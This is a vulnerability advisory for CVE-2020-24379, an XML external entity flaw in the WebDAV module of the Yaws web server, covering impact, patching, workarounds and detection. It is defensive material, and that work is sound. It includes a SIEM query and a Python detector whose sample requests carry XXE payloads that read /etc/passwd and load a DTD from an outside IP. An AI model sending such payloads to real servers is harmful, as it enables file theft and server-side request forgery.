CVE-2020-24379
📋 TL;DR
This vulnerability allows attackers to perform XML External Entity (XXE) injection attacks through the WebDAV implementation in Yaws web server. Attackers can read arbitrary files from the server, potentially leading to sensitive data exposure or server-side request forgery. Organizations running Yaws web server versions 1.81 through 2.0.7 with WebDAV enabled are affected.
💻 Affected Systems
- Yaws web server
📦 What is this software?
- Ubuntu Linux by Canonical
- Yaws by Yaws
⚠️ Risk & Real-World Impact
Worst Case
Complete server compromise allowing arbitrary file read, potential remote code execution, and full system access.
Likely Case
Sensitive file disclosure including configuration files, credentials, and system files leading to further attacks.
If Mitigated
Limited impact with proper network segmentation, file system permissions, and XML parsing restrictions.
🎯 Exploit Status
Public proof-of-concept code exists and has been weaponized. Exploitation requires WebDAV endpoint access but no authentication.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.0.8 and later
Vendor Advisory: https://github.com/erlyaws/yaws/commits/master
Restart Required: Yes
Instructions:
1. Upgrade Yaws to version 2.0.8 or later.
2. Download from official repository.
3. Stop Yaws service.
4. Install new version.
5. Restart Yaws service.
🔧 Temporary Workarounds
Disable WebDAV module
Linux: Disable the WebDAV functionality if not required
Edit yaws.conf and remove or comment out WebDAV configuration
Set <webdav>false</webdav> in server configuration
Restrict XML parsing
All platforms: Configure XML parser to disable external entity processing
Set XML parser configuration to disable DTD and external entities
🧯 If You Can't Patch
- Disable WebDAV module entirely in Yaws configuration
- Implement network-level restrictions to block access to WebDAV endpoints
🔍 How to Verify
Check if Vulnerable:
Check the Yaws version and the WebDAV configuration. If the version is between 1.81 and 2.0.7 and WebDAV is enabled, the system is vulnerable.
Check Version:
yaws --version or check running process version
Verify Fix Applied:
Verify Yaws version is 2.0.8 or later and test WebDAV endpoint with XXE payloads.
📡 Detection & Monitoring
Log Indicators:
- Unusual XML requests to WebDAV endpoints
- File read attempts via XML entities
- Error logs showing XML parsing failures
Network Indicators:
- HTTP requests with XML content containing external entity references
- Requests to WebDAV endpoints with unusual payloads
SIEM Query:
source="yaws" AND (uri="*webdav*" OR method="PROPFIND") AND content="<!ENTITY"
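The log and network indicators above can be checked offline. The following is an added example (not code from this advisory or from the Yaws project) that scans constructed request records for WebDAV methods whose body carries a DTD or an external entity declaration; the records, method list and regexes are assumptions for illustration.

```python
import re

# WebDAV methods that carry an XML body; a plain GET/POST is not in scope here.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "LOCK", "MKCOL", "COPY", "MOVE", "REPORT"}

# An entity declaration with a SYSTEM or PUBLIC identifier (including a
# parameter entity "<!ENTITY % name SYSTEM ...>") is the XXE signal.
ENTITY_DECL = re.compile(r"<!ENTITY\s+(%\s*)?[\w.-]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
# Ordinary WebDAV clients send no DOCTYPE at all, so any DTD is worth a look.
DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)

# Constructed sample records (method, uri, body); not real Yaws log output.
SAMPLE_REQUESTS = [
    ("PROPFIND", "/webdav/",
     '<?xml version="1.0"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>'),
    ("PROPFIND", "/webdav/",
     '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY ext SYSTEM "file:///etc/passwd">]>'
     '<D:propfind xmlns:D="DAV:"><D:prop><D:x>&ext;</D:x></D:prop></D:propfind>'),
    ("GET", "/index.html", ""),
    ("PROPPATCH", "/webdav/docs",
     '<!DOCTYPE x [<!ENTITY % p SYSTEM "http://203.0.113.5/x.dtd"> %p;]>'),
    ("LOCK", "/webdav/a.txt",
     '<!DOCTYPE x [<!ENTITY local "internal">]><D:lockinfo xmlns:D="DAV:"/>'),
]


def classify_request(method, uri, body):
    """Return 'external-entity', 'dtd' or None for one request record."""
    targets_dav = method.upper() in WEBDAV_METHODS or "webdav" in uri.lower()
    if not targets_dav:
        return None
    if ENTITY_DECL.search(body):
        return "external-entity"   # highest priority: matches the advisory's XXE
    if DOCTYPE.search(body):
        return "dtd"               # internal-only DTD; unusual, lower severity
    return None


def scan(records):
    """Return (index, method, uri, verdict) for every record that triggers."""
    findings = []
    for i, (method, uri, body) in enumerate(records):
        verdict = classify_request(method, uri, body)
        if verdict:
            findings.append((i, method, uri, verdict))
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit)
```

The two-level verdict lets a SIEM rule alert on "external-entity" immediately while only logging "dtd", which cuts noise from clients that embed harmless internal entities.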
🔗 References
- https://github.com/erlyaws/yaws/commits/master
- https://github.com/vulnbe/poc-yaws-dav-xxe
- https://lists.debian.org/debian-lts-announce/2020/09/msg00022.html
- https://packetstormsecurity.com/files/159106/Yaws-2.0.7-XML-Injection-Command-Injection.html
- https://usn.ubuntu.com/4569-1/
- https://vuln.be/post/yaws-xxe-and-shell-injections/
- https://www.debian.org/security/2020/dsa-4773